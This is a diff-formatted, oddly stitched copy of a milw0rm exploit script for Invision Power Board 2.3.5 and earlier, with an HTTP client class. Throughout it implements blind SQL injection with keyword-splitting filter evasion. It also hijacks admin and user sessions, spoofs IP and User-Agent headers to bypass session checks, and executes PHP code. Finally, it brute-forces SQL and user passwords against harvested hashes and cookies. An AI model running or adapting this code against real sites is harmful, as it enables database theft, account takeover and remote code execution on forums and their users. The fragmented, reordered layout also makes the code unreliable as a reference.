+
+        
+        
+            
+        
+        
+            
+            
+        
+
+        
+            
+            
+        
+        
+            
+            #i";
-		$this->reg_cpre = '#^(.*)session_id$#';
-		# $this->reg_acp  = '#s_agent = 'Mozilla Firefox';
-		$this->s_ip    = $this->def_ip;
-		
-		return;
-	}
-	
-	function bf_inj()
-	{
-		$this->sub_chr = $this->t_bchar;
-		$this->key_val = '';
-			
-		if( !empty($this->t_key) )
-		$this->msg('', 0);
-		
-		while( true )
-		{
-			if( $this->t_bchar < 0 )
-			$this->sub_chr--;
-			
-			else
-			$this->sub_chr++;
-	
-			# 0-9a-f
-			for( $j=0;$j<=count($this->t_char);$j++ )
-			{
-				# That one ?
-				$chr = $this->t_char[$j];
-				
-				# Latest char ?
-				if( $j === count($this->t_char) )
-				$chr = $this->t_end;
-				
-				# Ascii num
-				$asc = ord($chr);
-				
-				# Screen bug
-				if( !empty($this->t_key) ) 
-				{
-					$msg  = $this->t_key.'='.$this->key_val;
-					$msg .= ($chr === $this->t_end ? "\x20" : $chr);
-					
-					$this->msg($msg, 0, 1, 1);
-				}
-				
-				# Focus on the target ?
-				if( !empty($this->t_join) )
-				{
-					$inj = 
-					'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
-					' t, '.$this->p_pre.'members m WH%0DERE '.$this->t_join.
-					' AND m.'.$this->t_on.' AND ASC%0DII(SUBS%0DTR('.$this->t_field.
-					','.$this->sub_chr.',1))='.$asc.' '.$this->t_add_0;
-				}
-				else 
-				{
-					$inj =
-					'SEL%0DECT 1,'.$this->t_sel.' FR%0DOM '.$this->p_pre.$this->t_table.
-					' t WH%0DERE ASC%0DII(SUB%0DSTR('.$this->t_field.','.$this->sub_chr.
-					',1))='.$asc.' '.$this->t_add_0;
-				}
-
-				# SQL Injection via rawurldecode()
-				$inj = str_replace('%rep_req%', $inj, $this->def_inj);
-				$inj = str_replace('%rep_add%', $this->t_add_1, $inj);
-				$inj = str_replace(array('"', "'"), array('%2522', '%2527'), $inj);
-				
-				# Params
-				$inj = str_replace('%rep_inj%', $inj, $this->def_param);
-				$inj = str_replace(array(' ', '#'), array('%20', '%23'), $inj);
-				
-				$this->web->get($this->p_url.$inj);
-
-				# Ok !?
-				if( !strstr($this->web->getcontent(), 'notfound') )
-				{
-					if( $chr !== $this->t_end )
-					{	
-						$this->key_val .= $chr;
-						break;
-					}
-				}
-				
-				# End
-				if( $chr === $this->t_end )
-				{
-					# Reverse
-					if( $this->t_bchar < 0 )
-					$this->key_val = strrev($this->key_val);
-					
-					if( !empty($this->t_key) ) 
-					$this->msg($this->t_key.'='.$this->key_val, 1, 1, 1);
-
-					return $this->key_val;
-				}
-			}
-		}
-		
-	}
-	
-	function get_p($p, $exit=false)
-	{
-		global $argv;
-		
-		foreach( $argv as $key => $value )
-		{
-			if( $value === '-'.$p )
-			{
-				if( isset($argv[$key+1]) && !empty($argv[$key+1]) )
-				{					
-					return $argv[$key+1];
-				}
-				else
-				{
-					if( $exit )
-					$this->usage();
-					
-					return true;
-				}
-			}
-		}
-		
-		if( $exit )
-		$this->usage();
-		
-		return false;
-	}
-	
-	function msg($msg, $nstatus, $nspace=1, $ndel=0, $ask=false)
-	{
-		if( $ndel ) $type = "\r";
-		else        $type = "\n";
-		
-		# wtf (:
-		print
-		(
-			$type.str_repeat("\x20", $nspace).
-			$this->stat[$nstatus]."\x20".$msg
-		);
-		
-		if( $ask )
-		return trim(fgets(STDIN));
-	}
-	
-	function give_hope()
-	{				
-		$this->msg('You should try with another user or try another time', -1);
-			
-		exit(1);
-	}
-	
-	function mhead()
-	{
-		# Advisory: http://acid-root.new.fr/?0:18
-		
-		print "\n Invision Power Board <= 2.3.5 Multiple Vulnerabilities";
-		print "\n ------------------------------------------------------";
-		print "\n\n About:";
-		print "\n\n by DarkFig < gmdarkfig (at) gmail (dot) com >";
-		print "\n http://acid-root.new.fr/";
-		print "\n #acidroot@irc.worldnet.net";
-		print "\n\n\n Attack(s):\n";
-		
-		return;
-	}
-	
-	function usage()
-	{
-
-		print "\n -attack   [options]\n\n";
-		print "  1 - PHP code execution\n\n";
-		print "    -url        IPB url with ending slash\n\n";
-		print "    -uname      targeted username\n";
-		print "    -uid        OR the targeted user id (def: 1)\n\n";
-		print "    -prefix     sql table prefix (def: ibf_)\n";
-		print "    -acp        admin control panel path (def: admin)\n\n\n";
-		print "  2 - Insecure SQL password usage\n\n";
-		print "    -ip         your current IP\n";
-		print "    -dict       a wordlist file\n\n";
-		print "    -url        IPB url with ending slash\n";
-		print "    -uname      a valid member username\n";
-		print "    -pwd        the associated password\n\n";
-		print "    -uid        OR  the targeted member id\n";
-		print "    -passhash   the passhash cookie value\n";
-		print "    -stronghold the stronghold cookie value\n\n";
-		print "    -sqlusr     you can precise the sql user\n";
-		print "    -prefix     sql table prefix (def: ibf_)\n\n\n";
-		print "  3 - Password bruteforcer\n\n";
-		print "    -dict       a wordlist file\n\n";
-		print "    -url        IPB url with ending slash\n";
-		print "    -uname      targeted username\n";
-		print "    -uid        OR  the targeted user id (def: 1)\n";
-		print "    -prefix     sql table prefix (def: ibf_)\n\n";
-		print "    -passhash   OR the passhash value\n";
-		print "    -salt       the salt value\n\n\n";
-		print "  Optional: \n\n";
-		print "    -proxhost        if you wanna use a proxy\n";
-		print "    -proxauth   proxy with authentication\n";
-		
-		exit(1);
-	}
-	
-}
-
-
-
-/*
- * 
- * Copyright (C) darkfig
- * 
- * This program is free software; you can redistribute it and/or 
- * modify it under the terms of the GNU General Public License 
- * as published by the Free Software Foundation; either version 2 
- * of the License, or (at your option) any later version. 
- * 
- * This program is distributed in the hope that it will be useful, 
- * but WITHOUT ANY WARRANTY; without even the implied warranty of 
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the 
- * GNU General Public License for more details. 
- * 
- * You should have received a copy of the GNU General Public License 
- * along with this program; if not, write to the Free Software 
- * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
- * 
- * TITLE:          PhpSploit Class
- * REQUIREMENTS:   PHP 4 / PHP 5
- * VERSION:        2.1
- * LICENSE:        GNU General Public License
- * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt
- * FILENAME:       phpsploitclass.php
- *
- * CONTACT:        gmdarkfig@gmail.com (french / english)
- * GREETZ:         Sparah, Ddx39
- *
- * DESCRIPTION:
- * The phpsploit is a class implementing a web user agent.
- * You can add cookies, headers, use a proxy server with (or without) a
- * basic authentification. It supports the GET and the POST method. It can
- * also be used like a browser with the cookiejar() function (which allow
- * a server to add several cookies for the next requests) and the
- * allowredirection() function (which allow the script to follow all
- * redirections sent by the server). It can return the content (or the
- * headers) of the request. Others useful functions can be used for debugging.
- * A manual is actually in development but to know how to use it, you can
- * read the comments.
- *
- * CHANGELOG:
- *
- * [2008-08-29] (2.1)
- *  * New: The showheader()/showcookie() functions can now return an array
- *  * Bug #3 fixed: Problem concerning some servers for the main function
- *
- * [2007-06-10] (2.0)
- *  * Code: Code optimization
- *  * New: Compatible with PHP 4 by default
- *
- * [2007-01-24] (1.2)
- *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
- *  * New: multipart/form-data enctype is now supported 
- *
- * [2006-12-31] (1.1)
- *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
- *  * New: You can now call the getheader() / getcontent() function without parameters
- *
- * [2006-12-30] (1.0)
- *  * First version
- * 
- */
-
-class phpsploit
-{
-	var $proxyhost;
-	var $proxyport;
-	var $host;
-	var $path;
-	var $port;
-	var $method;
-	var $url;
-	var $packet;
-	var $proxyuser;
-	var $proxypass;
-	var $header;
-	var $cookie;
-	var $data;
-	var $boundary;
-	var $allowredirection;
-	var $last_redirection;
-	var $cookiejar;
-	var $recv;
-	var $cookie_str;
-	var $header_str;
-	var $server_content;
-	var $server_header;
-	
-
-	/**
-	 * This function is called by the
-	 * get()/post()/formdata() functions.
-	 * You don't have to call it, this is
-	 * the main function.
-	 *
-	 * @access private
-	 * @return string $this->recv ServerResponse
-	 * 
-	 */
-	function sock()
-	{
-		if(!empty($this->proxyhost) && !empty($this->proxyport))
-		   $socket = @fsockopen($this->proxyhost,$this->proxyport);
-		else
-		   $socket = @fsockopen($this->host,$this->port);
-	
-		if(!$socket)
-		   die("Error: Host seems down");
-		
-		if($this->method=='get')
-		   $this->packet = 'GET '.$this->url." HTTP/1.1\r\n";
-		   
-		elseif($this->method=='post' or $this->method=='formdata')
-		   $this->packet = 'POST '.$this->url." HTTP/1.1\r\n";
-		   
-		else
-		   die("Error: Invalid method");
-		
-		if(!empty($this->proxyuser))
-		   $this->packet .= 'Proxy-Authorization: Basic '.base64_encode($this->proxyuser.':'.$this->proxypass)."\r\n";
-		
-		if(!empty($this->header))
-		   $this->packet .= $this->showheader();
-		   
-		if(!empty($this->cookie))
-		   $this->packet .= 'Cookie: '.$this->showcookie()."\r\n";
-
-		$this->packet .= 'Host: '.$this->host."\r\n";
-		$this->packet .= "Connection: Close\r\n";
-		
-		if($this->method=='post')
-		{
-			$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data."\r\n";
-		}
-		elseif($this->method=='formdata')
-		{
-			$this->packet .= 'Content-Type: multipart/form-data; boundary='.str_repeat('-',27).$this->boundary."\r\n";
-			$this->packet .= 'Content-Length: '.strlen($this->data)."\r\n\r\n";
-			$this->packet .= $this->data;
-		}
-
-		$this->packet .= "\r\n";
-		$this->recv = '';
-
-		fputs($socket, $this->packet);
-
-		while(!feof($socket))
-		   $this->recv .= fgets($socket);
-
-		fclose($socket);
-
-		if($this->cookiejar)
-		   $this->getcookie();
-
-		if($this->allowredirection)
-		   return $this->getredirection();
-		else
-		   return $this->recv;
-	}
-	
-
-	/**
-	 * This function allows you to add several
-	 * cookies in the request.
-	 * 
-	 * @access  public
-	 * @param   string cookn CookieName
-	 * @param   string cookv CookieValue
-	 * @example $this->addcookie('name','value')
-	 * 
-	 */
-	function addcookie($cookn,$cookv)
-	{
-		if(!isset($this->cookie))
-		   $this->cookie = array();
-
-		$this->cookie[$cookn] = $cookv;
-	}
-
-
-	/**
-	 * This function allows you to add several
-	 * headers in the request.
-	 *
-	 * @access  public
-	 * @param   string headern HeaderName
-	 * @param   string headervalue Headervalue
-	 * @example $this->addheader('Client-IP', '128.5.2.3')
-	 * 
-	 */
-	function addheader($headern,$headervalue)
-	{
-		if(!isset($this->header))
-		   $this->header = array();
-		   
-		$this->header[$headern] = $headervalue;
-	}
-	
-	/**
-	 * This function allows you to use an
-	 * http proxy server. Several methods
-	 * are supported.
-	 * 
-	 * @access  public
-	 * @param   string proxy ProxyHost
-	 * @param   integer proxyp ProxyPort
-	 * @example $this->proxy('localhost',8118)
-	 * @example $this->proxy('localhost:8118')
-	 * 
-	 */
-	function proxy($proxy,$proxyp='')
-	{
-		if(empty($proxyp))
-		{
-			$proxarr = explode(':',$proxy);
-			$this->proxyhost = $proxarr[0];
-			$this->proxyport = (int)$proxarr[1];
-		}
-		else 
-		{
-			$this->proxyhost = $proxy;
-			$this->proxyport = (int)$proxyp;
-		}
-
-		if($this->proxyport > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-
-	/**
-	 * This function allows you to use an
-	 * http proxy server which requires a
-	 * basic authentification. Several
-	 * methods are supported:
-	 *
-	 * @access  public
-	 * @param   string proxyauth ProxyUser
-	 * @param   string proxypass ProxyPass
-	 * @example $this->proxyauth('user','pwd')
-	 * @example $this->proxyauth('user:pwd');
-	 * 
-	 */
-	function proxyauth($proxyauth,$proxypass='')
-	{
-		if(empty($proxypass))
-		{
-			$posvirg = strpos($proxyauth,':');
-			$this->proxyuser = substr($proxyauth,0,$posvirg);
-			$this->proxypass = substr($proxyauth,$posvirg+1);
-		}
-		else
-		{
-			$this->proxyuser = $proxyauth;
-			$this->proxypass = $proxypass;
-		}
-	}
-
-
-	/**
-	 * This function allows you to set
-	 * the 'User-Agent' header.
-	 * 
-	 * @access  public
-	 * @param   string useragent Agent
-	 * @example $this->agent('Firefox')
-	 * 
-	 */
-	function agent($useragent)
-	{
-		$this->addheader('User-Agent',$useragent);
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->header_str Headers
-	 * @return  array  $this->head Headers
-	 * @example $this->showheader()
-	 * @example $this->showheader(1)
-	 * 
-	 */
-	function showheader($array='')
-	{
-		$this->header_str = '';
-		
-		if(!isset($this->header))
-		   return;
-		   
-		if(!empty($array))
-			return $this->header;
-			
-		foreach($this->header as $name => $value)
-		   $this->header_str .= $name.': '.$value."\r\n";
-		   
-		return $this->header_str;
-	}
-
-	
-	/**
-	 * This function returns the cookies
-	 * which will be in the next request.
-	 * 
-	 * @access  public
-	 * @return  string $this->cookie_str Cookies
-	 * @return  array  $this->cookie Cookies
-	 * @example $this->showcookie()
-	 * @example $this->showcookie(1)
-	 * 
-	 */
-	function showcookie($array='')
-	{
-		if(!isset($this->cookie))
-		   return;
-		 
-		if(!empty($array))
-			return $this->cookie;
-		
-		$this->cookie_str = '';
-		
-		foreach($this->cookie as $name => $value)
-		   $this->cookie_str .= $name.'='.$value.'; ';
-
-		return $this->cookie_str;
-	}
-
-
-	/**
-	 * This function returns the last
-	 * formed http request.
-	 * 
-	 * @access  public
-	 * @return  string $this->packet HttpPacket
-	 * @example $this->showlastrequest()
-	 * 
-	 */
-	function showlastrequest()
-	{
-		if(!isset($this->packet))
-		   return;
-		else
-		   return $this->packet;
-	}
-
-
-	/**
-	 * This function sends the formed
-	 * http packet with the GET method.
-	 * 
-	 * @access  public
-	 * @param   string url Url
-	 * @return  string $this->sock()
-	 * @example $this->get('localhost/index.php?var=x')
-	 * @example $this->get('http://localhost:88/tst.php')
-	 * 
-	 */
-	function get($url)
-	{
-		$this->target($url);
-		$this->method = 'get';
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function sends the formed
-	 * http packet with the POST method.
-	 *
-	 * @access  public
-	 * @param   string url  Url
-	 * @param   string data PostData
-	 * @return  string $this->sock()
-	 * @example $this->post('http://localhost/','helo=x')
-	 * 
-	 */	
-	function post($url,$data)
-	{
-		$this->target($url);
-		$this->method = 'post';
-		$this->data = $data;
-		return $this->sock();
-	}
-	
-
-	/**
-	 * This function sends the formed http
-	 * packet with the POST method using
-	 * the multipart/form-data enctype.
-	 * 
-	 * @access  public
-	 * @param   array array FormDataArray
-	 * @return  string $this->sock()
-	 * @example $formdata = array(
-	 *                      frmdt_url => 'http://localhost/upload.php',
-	 *                      frmdt_boundary => '123456', # Optional
-	 *                      'var' => 'example',
-	 *                      'file' => array(
-	 *                                frmdt_type => 'image/gif',  # Optional
-	 *                                frmdt_transfert => 'binary' # Optional
-	 *                                frmdt_filename => 'hello.php,
-	 *                                frmdt_content => ''));
-	 *          $this->formdata($formdata);
-	 * 
-	 */
-	function formdata($array)
-	{
-		$this->target($array[frmdt_url]);
-		$this->method = 'formdata';
-		$this->data = '';
-		
-		if(!isset($array[frmdt_boundary]))
-		   $this->boundary = 'phpsploit';
-		else
-		   $this->boundary = $array[frmdt_boundary];
-
-		foreach($array as $key => $value)
-		{
-			if(!preg_match('#^frmdt_(boundary|url)#',$key))
-			{
-				$this->data .= str_repeat('-',29).$this->boundary."\r\n";
-				$this->data .= 'Content-Disposition: form-data; name="'.$key.'";';
-				
-				if(!is_array($value))
-				{
-					$this->data .= "\r\n\r\n".$value."\r\n";
-				}
-				else
-				{
-					$this->data .= ' filename="'.$array[$key][frmdt_filename]."\";\r\n";
-
-					if(isset($array[$key][frmdt_type]))
-					   $this->data .= 'Content-Type: '.$array[$key][frmdt_type]."\r\n";
-
-					if(isset($array[$key][frmdt_transfert]))
-					   $this->data .= 'Content-Transfer-Encoding: '.$array[$key][frmdt_transfert]."\r\n";
-
-					$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
-				}
-			}
-		}
-
-		$this->data .= str_repeat('-',29).$this->boundary."--\r\n";
-		return $this->sock();
-	}
-
-	
-	/**
-	 * This function returns the content
-	 * of the server response, without
-	 * the headers.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_content
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->get('http://localhost/'))
-	 * 
-	 */
-	function getcontent($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_content = '';
-		
-		for($i=1;$iserver_content .= $code[$i];
-
-		return $this->server_content;
-	}
-
-	
-	/**
-	 * This function returns the headers
-	 * of the server response, without
-	 * the content.
-	 * 
-	 * @access  public
-	 * @param   string code ServerResponse
-	 * @return  string $this->server_header
-	 * @example $this->getcontent()
-	 * @example $this->getcontent($this->post('http://localhost/','1=2'))
-	 * 
-	 */
-	function getheader($code='')
-	{
-		if(empty($code))
-		   $code = $this->recv;
-
-		$code = explode("\r\n\r\n",$code);
-		$this->server_header = $code[0];
-		
-		return $this->server_header;
-	}
-
-	
-	/**
-	 * This function is called by the
-	 * cookiejar() function. It adds the
-	 * value of the "Set-Cookie" header
-	 * in the "Cookie" header for the
-	 * next request. You don't have to
-	 * call it.
-	 * 
-	 * @access private
-	 * @param  string code ServerResponse
-	 * 
-	 */
-	function getcookie()
-	{
-		foreach(explode("\r\n",$this->getheader()) as $header)
-		{
-			if(preg_match('/set-cookie/i',$header))
-			{
-				$fequal = strpos($header,'=');
-				$fvirgu = strpos($header,';');
-				
-				// 12=strlen('set-cookie: ')
-				$cname  = substr($header,12,$fequal-12);
-				$cvalu  = substr($header,$fequal+1,$fvirgu-(strlen($cname)+12+1));
-				
-				$this->cookie[trim($cname)] = trim($cvalu);
-			}
-		}
-	}
-
-
-	/**
-	 * This function is called by the
-	 * get()/post() functions. You
-	 * don't have to call it.
-	 *
-	 * @access  private
-	 * @param   string urltarg Url
-	 * @example $this->target('http://localhost/')
-	 * 
-	 */
-	function target($urltarg)
-	{
-		if(!ereg('^http://',$urltarg))
-		   $urltarg = 'http://'.$urltarg;
-		
-		$urlarr = parse_url($urltarg);
-		
-		if(!isset($urlarr['path']) || empty($urlarr['path']))
-		   die("Error: No path precised");
-		
-		$this->url  = $urlarr['path'];
-		
-		if(isset($urlarr['query']))
-		   $this->url .= '?'.$urlarr['query'];
-		
-		$this->port = !empty($urlarr['port']) ? $urlarr['port'] : 80;
-		$this->host = $urlarr['host'];
-		
-		if($this->port != '80')
-		   $this->host .= ':'.$this->port;
-
-		$this->path = substr($urlarr['path'],0,strrpos($urlarr['path'],'/')+1);
-		
-		if($this->port > 65535)
-		   die("Error: Invalid port number");
-	}
-	
-	
-	/**
-	 * If you call this function,
-	 * the script will extract all
-	 * 'Set-Cookie' headers values
-	 * and it will automatically add
-	 * them into the 'Cookie' header
-	 * for all next requests.
-	 *
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->cookiejar(0)
-	 * @example $this->cookiejar(1)
-	 * 
-	 */
-	function cookiejar($code)
-	{
-		if($code=='0')
-		   $this->cookiejar=FALSE;
-
-		elseif($code=='1')
-		   $this->cookiejar=TRUE;
-	}
-
-
-	/**
-	 * If you call this function,
-	 * the script will follow all
-	 * redirections sent by the server.
-	 * 
-	 * @access  public
-	 * @param   integer code 1(enabled) 0(disabled)
-	 * @example $this->allowredirection(0)
-	 * @example $this->allowredirection(1)
-	 * 
-	 */
-	function allowredirection($code)
-	{
-		if($code=='0')
-		   $this->allowredirection=FALSE;
-		   
-		elseif($code=='1')
-		   $this->allowredirection=TRUE;
-	}
-
-	
-	/**
-	 * This function is called if
-	 * allowredirection() is enabled.
-	 * You don't have to call it.
-	 *
-	 * @access private
-	 * @return string $this->get('http://'.$this->host.$this->path.$this->last_redirection)
-	 * @return string $this->get($this->last_redirection)
-	 * @return string $this->recv;
-	 * 
-	 */
-	function getredirection()
-	{
-		if(preg_match('/(location|content-location|uri): (.*)/i',$this->getheader(),$codearr))
-		{
-			$this->last_redirection = trim($codearr[2]);
-			
-			if(!ereg('://',$this->last_redirection))
-			   return $this->get('http://'.$this->host.$this->path.$this->last_redirection);
-
-			else
-			   return $this->get($this->last_redirection);
-		}
-		else
-		   return $this->recv;
-	}
-
-
-	/**
-	 * This function allows you
-	 * to reset some parameters.
-	 * 
-	 * @access  public
-	 * @param   string func Param
-	 * @example $this->reset('header')
-	 * @example $this->reset('cookie')
-	 * @example $this->reset()
-	 * 
-	 */
-	function reset($func='')
-	{
-		switch($func)
-		{
-			case 'header':
-			$this->header = array();
-			break;
-				
-			case 'cookie':
-			$this->cookie = array();
-			break;
-				
-			default:
-			$this->cookiejar = '';
-			$this->header = array();
-			$this->cookie = array();
-			$this->allowredirection = '';
-			break;
-		}
-	}
-}
-
-$web = new phpsploit;
-$web->cookiejar(1);
-$web->agent('Mozilla Firefox');
-
-$ipb = new ipb_spl;
-$ipb->web =& $web;
-$ipb->main();
-
-?>
-
-# milw0rm.com [2008-08-29]
+#!/usr/bin/php -q
+mhead();
+		
+		# Gimme your args
+		$this->p_attack = $this->get_p('attack', true);
+		$this->p_prox   = $this->get_p('proxhost');
+		$this->p_proxa  = $this->get_p('proxauth');
+		
+		$this->init_global();
+		
+		# Proxy params
+		if( $this->p_prox )
+		{
+			$this->web->proxy($this->p_prox);
+			
+			if( $this->p_proxa )
+			$this->web->proxyauth($this->p_proxa);
+		}
+
+		# Where do we go ?
+		switch( $this->p_attack )
+		{
+			case 1:	 $this->code_exec();  break;
+			case 2:  $this->bf_sql_pwd(); break;
+			case 3:  $this->bf_usr_pwd(); break;
+			default: $this->usage();
+		}
+
+		return;
+	}
+	
+	function code_exec($loop=1)
+	{
+		# First loop
+		if( $loop == 1 )
+		{
+			$this->set_sql_param();
+			$this->set_sql_focus();
+		
+			$this->p_acp = $this->get_p('acp');
+				
+			# ACP path
+			if( !$this->p_acp )
+			{
+				# If the user changed the ACP directory, we can
+				# find it (if the "Remove ACP Link" option was not
+				# applied) by log in as an Admin, and then click
+				# on "Admin CP". This can be done with a user
+				# but I didn't implemented that  ;) 
+				$this->msg('Using default ACP path: admin', 1);
+				$this->p_acp = 'admin';
+			}
+			else 
+			$this->msg('Using ACP path "'.$this->p_acp.'"', 1);
+		
+			# Init client headers:
+			# Only if we have the same IP as the targeted user (not admin),
+			# it resets session datas, so we try to spoof our 
+			# IP as a random one in order to keep user's session datas while
+			# we bruteforce SQL fields.
+			$this->bypass_matches();
+		
+			# Remove expired sessions ( time() - 60*60*2  =  > 2 hours )
+			$this->web->get($this->p_url.$this->p_acp.'/index.php?');
+			$this->msg('Removed all out of date admin sessions', 1);
+		
+			# Cookie prefix
+			$this->get_cprefix();
+		}
+				
+		# Admin session ?
+		$this->msg('Trying to find an admin session id', 0);
+		
+		# Got one :]
+		if( $this->get_admin_sess() )
+		{
+			$this->s_admin = true;
+			$this->s_sess  = $this->data['a_sess_id'];
+			$this->a_url   = $this->p_url.$this->p_acp.'/index.php?adsess='.$this->s_sess;
+		}
+		
+		# Nothing special
+		else 
+		{
+			$this->s_admin = false;
+			$this->msg('No admin session id found', -1);
+		}
+		
+		# User session ?
+		if( !$this->s_sess )
+		{
+			$this->msg('Trying to find a user session id', 0);
+			
+			# Yep
+			if( $this->get_user_sess() )
+			$this->s_sess = $this->data['u_sess_id'];
+
+			# F0ck
+			else 
+			{
+				$this->msg('No user session id found', -1);
+				$this->msg('Admin session > 2 hours or user logged out', 0);
+				$this->msg('Keeping trying until the user connects', 0);
+				$this->msg('Entering loop #'.$loop.' ...', 0);
+				$this->code_exec(++$loop);
+			}
+		}
+			
+		$this->msg('Getting security options', 0);
+		
+		# Security options
+		$this->get_sec_options();
+		
+		# IP filter ?
+		if( $this->conf['ip'] === '1' )
+		{
+			$this->s_bypass = true;
+			
+			$this->msg('IP filter option is turned on', 0);
+			
+			# Spoofing protection ?
+			if( !$this->conf['xforward'] )
+			{
+				# Assuming our IP isn't the same etc..
+				$this->msg('Can\'t bypass the IP filter', -1);
+				exit(1);
+			}
+			
+			# X-Forwarded-For / Client-IP /
+			# Proxy-User / X-Cluster-Client-IP
+			else 
+			{
+				$this->msg('Cool, we can spoof our IP (Client-IP)', 1);
+				
+				if( $this->s_admin )
+				{
+					$this->msg('Trying to find admin\'s last IP', 0);
+					
+					# Admin IP found
+					$this->get_admin_ip();
+					$this->s_ip = $this->data['a_ip_addr'];
+				}
+				else 
+				{
+					$this->s_admin = false;
+					$this->msg('Trying to find user\'s last used IP', 0);
+					
+					# User IP found
+					$this->get_user_ip();
+					$this->s_ip = $this->data['u_ip_addr'];
+				}
+				
+				# Nothing found
+				if( !$this->s_ip )
+				{
+					# Ahah (:
+					$this->msg('No IP found for this user', -1);
+					$this->give_hope();
+				}
+				
+				# Got one !
+				else
+				$this->msg('Ok, using IP '.$this->s_ip, 1);
+			}
+		}
+		
+		# User-Agent filter ?
+		if( $this->conf['browser'] === '1' && !$this->s_admin )
+		{
+			$this->s_bypass = true;
+			
+			$this->msg('Trying to find a valid user-agent', 0);
+			
+			# Good
+			if( $this->get_user_agent() )
+			{
+				$this->msg('Ok, using user-agent '.substr($this->data['u_agent'], 0, 10).'...', 1);
+				$this->s_agent = $this->data['u_agent'];
+			}
+			
+			# WTF :!
+			else
+			{
+				$this->msg('No user-agent found for this user', -1);
+				$this->msg('Maybe the browser didn\'t send this header', 0);
+				$this->s_agent = '';
+			}
+			
+		}
+
+		# Cool !?
+		if( !$this->s_bypass )
+		$this->msg('Cool, nothing to bypass', 1);
+		
+		$this->msg('Trying to log in', 0);
+		
+		# Owned =]
+		if( $this->is_logged() )
+		{
+			# PHP code
+			if( $this->s_admin )
+			{
+				$this->msg('Logged in with an admin session', 1);
+				$this->exec_code();
+			}
+			
+			# Normal user ?
+			else
+			{
+				$this->msg('Logged in with a user session', 1);
+				$this->msg('You can log in using the cookie session_id', 1);
+
+				if( $this->s_ip !== $this->def_ip )
+				$this->msg('Set the Client-IP header to: '.$this->s_ip, 1);
+				
+				if( $this->s_agent )
+				$this->msg('Set the User-Agent header to: '.$this->s_agent, 1);
+				
+				exit(0);
+			}
+		}
+		else 
+		{
+			# Even if the admin logged out .. the admin session
+			# is still valid  ;) 
+			$this->msg('Can\'t log in, the session has expired ?!', -1);
+			$this->give_hope();
+		}
+		
+		return;
+	}
+	
+	function bf_sql_pwd()
+	{
+		$this->p_ip    = $this->get_p('ip', true);
+		$this->p_dict  = $this->get_p('dict', true);
+		
+		$this->p_sql_u = $this->get_p('sqlusr');
+		
+		$this->p_url   = $this->get_p('url');
+		$this->p_uname = $this->get_p('uname');
+		$this->p_pwd   = $this->get_p('pwd');
+		// or 
+		$this->p_uid   = $this->get_p('uid');
+		$this->p_hash  = $this->get_p('passhash');
+		$this->p_shold = $this->get_p('stronghold');
+		
+		if( $this->p_uname && $this->p_pwd && $this->p_url )
+		{
+			$this->get_cprefix();
+			
+			$this->msg('Trying to get some cookies', 0);
+			
+			$g_dat = 'index.php?act=Login&CODE=01&CookieDate=1';
+			$p_dat = 'UserName='.$this->p_uname.'&PassWord='.$this->p_pwd.'&x=0&y=0';
+		
+			$this->web->post($this->p_url.$g_dat, $p_dat);
+		
+			$this->p_uid   = $this->web->cookie[$this->s_cprefix.'member_id'];
+			$this->p_hash  = $this->web->cookie[$this->s_cprefix.'pass_hash'];
+			$this->p_shold = $this->web->cookie[$this->s_cprefix.'ipb_stronghold'];
+		}
+		elseif( !$this->p_uid || !$this->p_hash || !$this->p_shold )
+		$this->usage();
+		
+		if( !$this->p_uid || !$this->p_hash || !$this->p_shold )
+		{
+			$this->msg('Can\'t get cookies', -1);
+			$this->msg('You should try with other parameters', -1);
+			exit(1);
+		}
+		
+		$this->msg('Ok, using cookies:', 1);
+		
+		$this->msg('member_id='.$this->p_uid, 1);
+		$this->msg('pass_hash='.$this->p_hash, 1);
+		$this->msg('ipb_stronghold='.$this->p_shold, 1);
+		
+		if( !$this->p_sql_u )
+		{
+			$this->set_sql_param();
+			
+			$this->msg('Trying to get the current sql user', 0);
+			
+			if( !$this->get_sql_user() )
+			{
+				$this->msg('Can\'t get the sql user', -1);
+				$this->msg('If you know the sql user, use -sqlusr', -1);
+				exit(1);
+			}
+			else
+			$this->p_sql_u = $this->data['sql_user'];
+		}
+		
+		$this->msg('Ok, using sql user '.$this->p_sql_u, 1);
+		
+		$dico_c = file($this->p_dict);
+		$ip_a   = explode('.', $this->p_ip);
+		
+		$this->msg('Entering local dictionnary attack ('.count($dico_c).' words)', 0);
+		$this->msg('You should take a drink ...', 0);
+		
+		foreach( $dico_c as $line )
+		{
+			$md5 = md5(trim($line).$this->p_sql_u);
+			$md5 = md5($this->p_uid.'-'.$ip_a[0].'-'.$ip_a[1].'-'.$this->p_hash).$md5;
+			$md5 = md5($md5);
+
+			if( $this->p_shold === $md5 )
+			{
+				$this->msg('Found something cool =]', 1);
+				$this->msg('SQL password: '.$line, 1);
+				exit(1);
+			}
+
+		}
+		
+		$this->msg('End of the wordlist, password not found', -1);
+		
+		return;
+	}
+
+	function bf_usr_pwd()
+	{
+		$this->p_dict  = $this->get_p('dict', true);
+
+		$this->p_hash  = $this->get_p('passhash');
+		$this->p_salt  = $this->get_p('salt');
+		
+		if( !$this->p_hash || !$this->p_salt )
+		{
+			$this->set_sql_param();
+			$this->set_sql_focus();
+		}
+		
+		if( !$this->p_hash )
+		{
+			$this->msg('Trying to get the password hash', 0);
+			
+			if( !$this->get_pass_hash() )
+			{
+				$this->msg('Can\'t get the password hash', -1);
+				exit(1);
+			}
+			else 
+			$this->p_hash = $this->data['pass_hash'];
+		}
+		
+		$this->msg('Ok, using hash '.$this->p_hash, 1);
